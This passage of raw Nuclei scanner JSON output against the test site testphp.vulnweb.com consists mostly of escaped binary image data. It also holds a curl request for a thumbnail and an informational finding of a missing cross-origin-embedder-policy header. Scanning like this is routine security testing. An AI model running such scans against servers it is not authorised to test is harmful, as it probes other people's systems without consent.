x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:43.069392488Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW 